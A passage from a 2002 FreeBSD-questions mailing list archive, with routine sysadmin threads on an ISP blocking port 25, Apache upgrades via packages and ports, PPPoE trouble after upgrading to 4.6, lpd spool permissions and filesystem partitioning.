18:59:04 -0000 Received: from unknown (HELO localhost.kdrache.org) (127.0.0.1) by loopback with SMTP; 24 Jun 2002 18:59:04 -0000 Subject: Re: can't telnet anything on port 25 From: Martin Klaffenboeck To: David Banning Cc: questions@freebsd.org In-Reply-To: <20020624140920.A22529@skytrackercanada.com> References: <20020624140920.A22529@skytrackercanada.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 24 Jun 2002 20:59:04 +0200 Message-Id: <1024945144.7531.11.camel@martin.kleinerdrache.org> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Am Mo, 2002-06-24 um 20.09 schrieb David Banning: > I can't seem to telnet any server on port 25; > > su-2.03# telnet skytrackercanada.com 25 > Trying 209.188.66.29... > telnet: connect to address 209.188.66.29: Operation timed out > telnet: Unable to connect to remote host > su-2.03# Are you sure you have access on port 25 on the remote machine? How have you tryed that and how can you be sure? Martin -- Virtuelle Jugendarbeit auf http://create.kleinerdrache.org ... bald kommt ein neues Layout ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12: 4:40 2002 Delivered-To: freebsd-questions@freebsd.org Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by hub.freebsd.org (Postfix) with ESMTP id C91C437B401; Mon, 24 Jun 2002 12:04:33 -0700 (PDT) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (8.12.4/8.12.4) with SMTP id g5OJ6CBT038649; Mon, 24 Jun 2002 15:06:12 -0400 (EDT) (envelope-from freebsd@ec.rr.com) Message-ID: <2600.192.168.1.4.1024945572.squirrel@webmail.probsd.ws> Date: Mon, 24 Jun 2002 15:06:12 -0400 (EDT) Subject: RE: libparanoia From: "Michael Sharp" To: , X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG So, if I install libparanoia.. I would then add to any Makefile's CFLAGS arguments -lparanoia -L/usr/local/lib ? Example: /usr/ports/www/apache13/Makefile change: CFLAGS+= -O6 -fomit-frame-pointer to: CFLAGS+= -O6 -fomit-frame-pointer -lparanoia -L/usr/local/lib and apache13 would be built using /usr/local/lib/libparanoia.so ? Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:10:25 2002 Delivered-To: freebsd-questions@freebsd.org Received: from skytrackercanada.com (cust29.209.188.66.dsl.accessv.com [209.188.66.29]) by hub.freebsd.org (Postfix) with ESMTP id 3927D37B400 for ; Mon, 24 Jun 2002 12:10:16 -0700 (PDT) Received: (from david@localhost) by skytrackercanada.com (8.12.3/8.12.3) id g5OJA5va022879; Mon, 24 Jun 2002 15:10:05 -0400 (EDT) (envelope-from david) Date: Mon, 24 Jun 2002 15:10:05 -0400 From: David Banning To: Matthew Seaman Cc: questions@FreeBSD.ORG Subject: Re: can't telnet anything on port 25 Message-ID: <20020624151005.B22849@skytrackercanada.com> References: <20020624140920.A22529@skytrackercanada.com> <20020624185034.GA10465@happy-idiot-talk.infracaninophi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020624185034.GA10465@happy-idiot-talk.infracaninophi>; from m.seaman@infracaninophile.co.uk on Mon, Jun 24, 2002 at 07:50:35PM +0100 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 24, 2002 at 07:50:35PM +0100, Matthew Seaman wrote: > On Mon, Jun 24, 2002 at 02:09:20PM -0400, David Banning wrote: > > > > I can't seem to telnet any server on port 25; > > > > su-2.03# telnet skytrackercanada.com 25 > > Trying 209.188.66.29... > > telnet: connect to address 209.188.66.29: Operation timed out > > telnet: Unable to connect to remote host > > su-2.03# > > Seems that nothing is listening on the SMTP port --- since you aren't > firewalled, I guess you aren't running an MTA --- sendmail, qmail, > postfix or the like. You can see what ports daemons are listening on > by running `netstat -a' or `sockstat'. I believe now that the host ISP is blocking our box making any inquiries on port 25 to any server but thiers. Thanks for the tip of the netstat -a and sockstat commands they will come in useful. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:13:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id AE77637B401 for ; Mon, 24 Jun 2002 12:13:07 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5OJChr27454; Mon, 24 Jun 2002 15:12:43 -0400 Message-ID: <3D1770A3.10009@potentialtech.com> Date: Mon, 24 Jun 2002 15:18:59 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Margie W Cc: FreeBSD-Questions@freebsd.org Subject: Re: Least Painful Upgrade Path References: <20020624184757.61593.qmail@web11008.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Margie W wrote: > I have a system built about a month ago with > 4.5-STABLE. One of the packages I installed at that > time was Apache-2.0.35. I need to upgrade that > package to 2.0.39 due to the security bug discovered > last week. > > Is the easiest upgrade path to backup the site > content, uninstall the package, and then re-install > .39... then recreate the document directories.. and > restore the content? That is probably the easiest path. Don't forget to backup your Apache .conf files as well before upgrading. Never do any upgrade of any type without backing up first. This goes for Linux, Windows ... any software. > Does pkg_add have a command line "upgrade" flag that I > can use that automates all this? Use portupgrade as described by another response. > I've seen people metion CVS, which I'm not very > familiar with. From what I've read, that seems the > best bet for performing a system-wide code > update/upgrade (I think people refer to this as a > 'build world', right?)... but overkill for one > package. Esp if I have to manually compose a > functional Makefile and recompile the whole system. If you use portupgrade, you need to use cvsup to make sure your ports tree is updated or you won't be getting the latest Apache. You don't need to make/buildworld or anything like that to do apache. cvsup is just a program used to synchronize file versions, for Apache, you want to synchronize your ports tree, then upgrade the Apache port. > How do your answers change if I said I had a > 4.0-STABLE system that I wanted to fully upgrade to > 4.6, inc all packages/(custom) kernel. CVSsup? (I > do, but it's another system that I can worry about > later.) Follow the cvsup/build/installworld instructions in the handbook: http://www.freebsd.org/handbook/cutting-edge.html Once your system is 4.6-STABLE, just cvsup your ports tree and use portupgrade on Apache there as well. It's time-consuming, but you can do other things while it's running. It it's a production box, nice the build process to keep it from intefering with other work the machine may be doing. After you install cvsup, it puts example config files in /usr/share/examples/cvsup. The "ports-supfile" will get you 90% of the way to cvsupping your ports. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:23: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tungsten.btinternet.com (tungsten.btinternet.com [194.73.73.81]) by hub.freebsd.org (Postfix) with ESMTP id B928337B403 for ; Mon, 24 Jun 2002 12:22:52 -0700 (PDT) Received: from host213-123-66-57.in-addr.btopenworld.com ([213.123.66.57] helo=btinternet.com) by tungsten.btinternet.com with esmtp (Exim 3.22 #8) id 17MZQ8-0003XP-00; Mon, 24 Jun 2002 20:22:40 +0100 Message-ID: <3D177181.4070505@btinternet.com> Date: Mon, 24 Jun 2002 20:22:41 +0100 From: Jonathan Heaney User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1a) Gecko/20020611 X-Accept-Language: en MIME-Version: 1.0 To: Steve Tremblett Cc: questions@FreeBSD.ORG Subject: Re: ppp broken after 4.6 upgrade? References: <20020622101023.A18927@sjt-u10.cisco.com> <20020624122951.D1551@sjt-u10.cisco.com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I've had a PPP problem since going from 4.5 -> 4.6 too, I had to revert to 4.5 though and forgot to dump my logs *cough* first. I believe there is a problem with 4.6's pppoe, I do not know exact details though, although I think a fix has been uploaded somewhere (presumably to the place updates are uploaded to, I'm no freebsd expert, I only use it because there were straightforward howtos for setting up a gateway/firewall) At least you're dialling out - my problem seems to be a bit more serious than that. I'm guessing it's a configuration issue, but as I did not have any logged info I (assume) no-one can help me, and I'm loathe to re-install 4.6 just to get the logs again when it doesn't work as it takes ages on a p233. If you get 4.6 working, can you let me know how, as if I'm to attempt a re-install I'd like to have at least one thing I can try to make it work before reverting to 4.5. Jonathan Steve Tremblett wrote: >anyone? > >+---- Steve Tremblett wrote: >| Upgraded to 4.5-4.6 yesterday - everything works fine except for ppp >| and I'm stumped. In the mergemaster phase I kept my ppp.conf as it was >| and I was using PPP all afternoon before installing the build. Please >| help! :) >| >| I've included syslog of a failed session as well as my ppp.conf. When >| I run "ppp -background pppoe", I see it attempting redials every 10 >| seconds or so. Everything still works on my other PC, so I know the >| problem is on this end. >| >| ppp.conf: >| >| default: >| set log Phase Chat LCP IPCP CCP tun command >| nat enable yes >| nat same_ports yes >| nat use_sockets yes >| set redial 15 28800 >| set reconnect 15 28800 >| >| pppoe: >| set device PPPoE:xl0 >| set mru 1492 >| set mtu 1492 >| set speed sync >| enable lqr >| set lqrperiod 5 >| set cd 5 >| set dial >| set login >| set timeout 0 >| set authname xxxxxxxx >| set authkey xxxxxxxx >| set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0 >| add default HISADDR >| enable dns >| >| >| syslog (2 redials before I ^Ced it): >| >| Jun 22 09:39:23 sjt-bsd ppp[169]: Phase: Using interface: tun0 >| Jun 22 09:39:23 sjt-bsd ppp[169]: Phase: deflink: Created in closed state >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat enable yes >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat same_ports yes >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: nat use_sockets yes >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: set redial 15 28800 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: default: set reconnect 15 28800 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set device PPPoE:xl0 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set mru 1492 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set mtu 1492 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set speed sync >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: enable lqr >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set lqrperiod 5 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set cd 5 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set dial >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set login >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set timeout 0 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set authname xxxxxxx >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set authkey ******** >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0 >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: add default HISADDR >| Jun 22 09:39:23 sjt-bsd ppp[169]: tun0: Command: pppoe: enable dns >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: PPP Started (background mode). >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: bundle: Establish >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: closed -> opening >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: Connected! >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> dial >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Chat: deflink: Dial attempt 1 of 28800 >| Jun 22 09:39:23 sjt-bsd ppp[170]: tun0: Phase: deflink: dial -> carrier >| Jun 22 09:39:26 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_ACNAME (hook "62031129938542-sHù¿¿ËÒ^G^HM-^@â ^H^P0^K^H") >| Jun 22 09:39:27 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_<11> (hook "M-^T5^H^Hh0^K^H") >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: carrier -> hangup >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Connect time: 5 secs: 0 octets in, 0 octets out >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: : 0 packets in, 0 packets out >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: total 0 bytes/sec, peak 0 bytes/sec on Sat Jun 22 09:39:23 2002 >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: hangup -> opening >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Phase: deflink: Enter pause (15) for redialing. >| Jun 22 09:39:28 sjt-bsd ppp[170]: tun0: Chat: Parent notified of redial >| Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Chat: deflink: Redial timer expired. >| Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: Connected! >| Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> dial >| Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Chat: deflink: Dial attempt 2 of 28800 >| Jun 22 09:39:43 sjt-bsd ppp[170]: tun0: Phase: deflink: dial -> carrier >| Jun 22 09:39:46 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_ACNAME (hook "62031129938542-sHù¿¿ËÒ^G^HM-^@â ^H^P0^K^H") >| Jun 22 09:39:47 sjt-bsd ppp[170]: tun0: Phase: Received NGM_PPPOE_<11> (hook "M-^Z5^H^Hh0^K^H") >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: carrier -> hangup >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Connect time: 5 secs: 0 octets in, 0 octets out >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: : 0 packets in, 0 packets out >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: total 0 bytes/sec, peak 0 bytes/sec on Sat Jun 22 09:39:43 2002 >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: hangup -> opening >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Phase: deflink: Enter pause (15) for redialing. >| Jun 22 09:39:48 sjt-bsd ppp[170]: tun0: Chat: Parent notified of redial >| Jun 22 09:39:56 sjt-bsd ppp[169]: tun0: Phase: Parent: Signal 2 >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: Caught signal 2, abort connection(s) >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: deflink: Disconnected! >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: deflink: opening -> closed >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: bundle: Dead >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Phase: PPP Terminated (normal). >| Jun 22 09:39:56 sjt-bsd ppp[169]: tun0: Phase: Parent: Child failed (errdead) >| Jun 22 09:39:56 sjt-bsd ppp[170]: tun0: Chat: Parent notified of failure >| >| -- >| Steve Tremblett >| >| To Unsubscribe: send mail to majordomo@FreeBSD.org >| with "unsubscribe freebsd-questions" in the body of the message >| >+---end quoted text--- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:33:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id D8D1437B400 for ; Mon, 24 Jun 2002 12:33:37 -0700 (PDT) Received: from praiadosamores.melim.com.br (praiadosamores.melim.com.br [200.215.110.20]) by mail.melim.com.br (Postfix) with SMTP id 6F7EDBAC8; Mon, 24 Jun 2002 16:33:30 -0300 (BRT) Date: Mon, 24 Jun 2002 16:33:30 -0300 From: Ronan Lucio To: Warren Block Cc: freebsd-questions@FreeBSD.ORG Subject: Re: LPD Error Message-Id: <20020624163330.4db03459.ronanl@melim.com.br> In-Reply-To: References: <20020621164302.7ae843a6.ronanl@melim.com.br> Organization: Melim Internet X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello Warren, > > But, if it's wrong, how should I set the users permissions? > > chown -R daemon.daemon /var/spool/output/lpd/spo I've did it but the lpd still don't work... :-/ # ls -l /var/spool/lpd/ total 10 drwxr-xr-x 2 daemon daemon 512 Jun 7 16:51 lp drwxr-xr-x 2 daemon daemon 512 Jun 7 17:51 ra1-14 drwxr-xr-x 2 daemon daemon 512 Jun 7 16:51 ra1-15 drwxr-xr-x 2 daemon daemon 512 Jun 7 17:04 ra1-16 drwxr-xr-x 2 daemon daemon 512 Jun 24 13:22 spo # ls -l /var/spool/output/lpd/ total 10 drwxr-xr-x 2 daemon daemon 512 Jun 24 09:45 lp drwxr-xr-x 2 daemon daemon 512 Jun 24 09:44 ra1-14 drwxr-xr-x 2 daemon daemon 512 Jun 24 09:44 ra1-15 drwxr-xr-x 2 daemon daemon 512 Jun 24 09:44 ra1-16 drwxr-xr-x 2 daemon daemon 512 Jun 24 09:44 spo tail /var/log/lpd-errs Jun 24 09:52:52 server lpd[38417]: f50 requests recvjob spo Jun 24 09:53:02 server lpd[38418]: f50 requests displayq short spo Jun 24 09:53:58 server lpd[38428]: f50 requests recvjob spo Jun 24 09:54:44 server lpd[38463]: f50 requests displayq short spo Jun 24 09:54:53 server lpd[38467]: f50 requests displayq short spo Jun 24 09:55:04 server lpd[38471]: f50 requests displayq short spo tail /var/log/messages Jun 24 09:52:52 server lpd[38417]: f50 requests recvjob spo Jun 24 09:53:02 server lpd[38418]: f50 requests displayq short spo Jun 24 09:53:58 server lpd[38428]: f50 requests recvjob spo Jun 24 09:54:44 server lpd[38463]: f50 requests displayq short spo Jun 24 09:54:53 server lpd[38467]: f50 requests displayq short spo Jun 24 09:55:04 server lpd[38471]: f50 requests displayq short spo # uname -v FreeBSD 4.5-RELEASE #3: Mon May 27 10:04:24 BRT 2002 Do you have any idea what can it be? Thank you very much, Ronan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:40: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail0.rawbw.com (mail0.rawbw.com [198.144.192.41]) by hub.freebsd.org (Postfix) with ESMTP id 734E537B404 for ; Mon, 24 Jun 2002 12:39:55 -0700 (PDT) Received: from john1 (m206-98.dsl.tsoft.com [198.144.206.98]) by mail0.rawbw.com (8.11.3/8.11.3) with SMTP id g5OJdsd24941 for ; Mon, 24 Jun 2002 12:39:54 -0700 (PDT) (envelope-from jnewlin@tsoft.com) Message-ID: <000701c21bb6$59221980$0b01a8c0@john1> From: "John Newlin" To: Subject: diagnosing a crash Date: Mon, 24 Jun 2002 12:35:49 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I came home to see my FreeBSD box had rebooted. Is there a place where crash information gets logged out, it was scrolled past on the console. I am just wary that someone may have hacked in and forced a boot, and possibly installed some type of root kit. Thanks, -John Newlin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 12:59:12 2002 Delivered-To: freebsd-questions@freebsd.org Received: from empty1.ekahuna.com (empty1.ekahuna.com [198.144.200.196]) by hub.freebsd.org (Postfix) with ESMTP id 57C5F37B4CC for ; Mon, 24 Jun 2002 12:58:04 -0700 (PDT) Received: from pc-02 (pc02.ekahuna.com [198.144.200.197]) by empty1.ekahuna.com (Post.Office MTA v3.5.3 release 223 ID# 0-0U10L2S100V35) with ESMTP id com for ; Mon, 24 Jun 2002 12:58:03 -0700 From: "Philip J. Koenig" Organization: The Electric Kahuna Organization To: questions@FreeBSD.ORG Date: Mon, 24 Jun 2002 12:58:02 -0700 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: RE: root partition Reply-To: pjklist@ekahuna.com In-reply-to: X-mailer: Pegasus Mail for Win32 (v3.12c) Message-ID: <20020624195803617.AAA703@empty1.ekahuna.com@pc02.ekahuna.com> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Mon, 24 Jun 2002 12:36:24 -0500 (CDT) > From: Jason P Holland > > yes, absolutely, that is a best practice. if /var fills up, you don't > want that to affect /. also, /tmp should be seperate, because its a DoS > since /tmp can be written by any user, they could conceivably fill up /. > the only case this would be ok, would be if you were installing on a > smaller hard drive, which gives you less room to juggle around. > > jason Yep. My usual practice is to create a separate /var partition, create /var/tmp, and symlink /tmp to /var/tmp. If you don't have a separate /var filesystem, I recommend: Create /usr/var Create /usr/var/tmp Symlink /var to /usr/var Symlink /tmp to /usr/var/tmp If the time comes you get a separate /var partition (ie during a drive upgrade) it becomes fairly easy to move the whole /usr/var collection to /var. Phil -- Philip J. Koenig pjklist@ekahuna.com Electric Kahuna Systems -- Computers & Communications for the New Millenium To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13: 3:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by hub.freebsd.org (Postfix) with ESMTP id B4DC337B400 for ; Mon, 24 Jun 2002 13:03:44 -0700 (PDT) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5OK3h4W010800; Mon, 24 Jun 2002 21:03:43 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5OK3buS010799; Mon, 24 Jun 2002 21:03:37 +0100 (BST) Date: Mon, 24 Jun 2002 21:03:37 +0100 From: Matthew Seaman To: Margie W Cc: FreeBSD-Questions@FreeBSD.ORG Subject: Re: Least Painful Upgrade Path Message-ID: <20020624200337.GB10465@happy-idiot-talk.infracaninophi> References: <20020624184757.61593.qmail@web11008.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624184757.61593.qmail@web11008.mail.yahoo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, Jun 24, 2002 at 11:47:57AM -0700, Margie W wrote: > I have a system built about a month ago with > 4.5-STABLE. One of the packages I installed at that > time was Apache-2.0.35. I need to upgrade that > package to 2.0.39 due to the security bug discovered > last week. > Is the easiest upgrade path to backup the site > content, uninstall the package, and then re-install > .39... then recreate the document directories.. and > restore the content? That's pretty much it, if you're going to use pre-compiled packages. However, while you should certainly back up your documents and httpd.conf files in case of accidents. pkg_delete(1) shouldn't touch /usr/local/etc/apache2/httpd.conf. Neither will it remove any files from /usr/local/www/data or /usr/local/www/cgi-bin *so long* as you've made sure they are distinct from /usr/local/www/data.default or /usr/local/www/cgi-bin.default. Which means that you should be able to do: pkg_delete -f apache-2.0.35 pkg_add -r ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/All/apache-2.0.39.tgz and be pretty much ready to go. However, apache-2.0.39.tgz doesn't seem to have hit the ftp mirrors quite yet. > Does pkg_add have a command line "upgrade" flag that I > can use that automates all this? Not as such. Perhaps your best bet is the highly recommended `portupgrade' suite of programs. Try grabbing the portupgrade-20020429.tgz package and the packages it depends on from one of the mirrors: % pkg_info -r portupgrade-\* Information for portupgrade-20020429_1: Depends on: ruby-1.6.7.2002.05.23 ruby-shim-ruby18-1.7.2.2002.05.21 ruby-optparse-0.8.6 ruby-bdb1-0.1.7 pkg_tarup-1.2_3 (pkg_add -r should grab the dependencies automatically.) > I've seen people mention CVS, which I'm not very > familiar with. From what I've read, that seems the > best bet for performing a system-wide code > update/upgrade (I think people refer to this as a > 'build world', right?)... but overkill for one > package. Esp if I have to manually compose a > functional Makefile and recompile the whole system. Uh --- no. You don't need to know anything about CVS or need to write any Makefiles to recompile the system from source -- usually described as `make buildworld', but necessarily followed by: make buildkernel make installkernel reboot (to single user mode) make installworld mergemaster reboot Similarly it's almost a no-brainer to use the ports system to install software from source. You don't need to know much at all about programming to be able to use ports: the usual procedure to install some software --- say apache-2.0.39 --- goes something like this: cd /usr/ports/www/apache2 make install What you should observe is the apache2 source code being downloaded, unpacked, patches applied, compiled, installed and the whole deal recorded in the /var/db/pkg database. If the port has dependencies on other ports, they will be downloaded, built and installed automatically. Just from those two commands. That's the point of ports --- all the hard work is done for you... Of course, if you're going to compile stuff from source, you obviously need to get hold of it. Similarly you need to grab the ports tree if you want to install ports from source code. cvsup is the way to go to do that. Look at http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/cutting-edge.html (Chapter 19 of the handbook) http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/synching.html and http://www.polstra.com/projects/freeware/CVSup/faq.html for instructions. > How do your answers change if I said I had a > 4.0-STABLE system that I wanted to fully upgrade to > 4.6, inc all packages/(custom) kernel. CVSsup? (I > do, but it's another system that I can worry about > later.) I'm a big fan of upgrading from source, but the jump from 4.0 to 4.6 is a bit tricky. Hunt through the mailing list archives (-questions, -stable) for war stories. It's doable, but you're probably going to find it a lot easier to simply reinstall with 4.6. Once you've got the base system upto date, use `cvsup' to grab the latest ports and `portupgrade' to upgrade to the latest versions of all your installed software. If the box has X installed, you probably need to de-install the X-3.3.x that was current with FreeBSD 4.0 and replace it with the X-4.2.0 that's current now. Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 13:16: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web20603.mail.yahoo.com (web20603.mail.yahoo.com [216.136.226.161]) by hub.freebsd.org (Postfix) with SMTP id 582D337B400 for ; Mon, 24 Jun 2002 13:15:59 -0700 (PDT) Message-ID: <20020624201556.16879.qmail@web20603.mail.yahoo.com> Received: from [142.173.224.254] by web20603.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 13:15:56 PDT Date: Mon, 24 Jun 2002 13:15:56 -0700 (PDT) From: "Mr. Darren" Subject: cdrdao on ide. To: freebsd-questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I need some up to date documentation, something that I can follow for the current version of FreeBSd... burncd just doesn't cut it, in fact the project has been droped by it's creater. I think 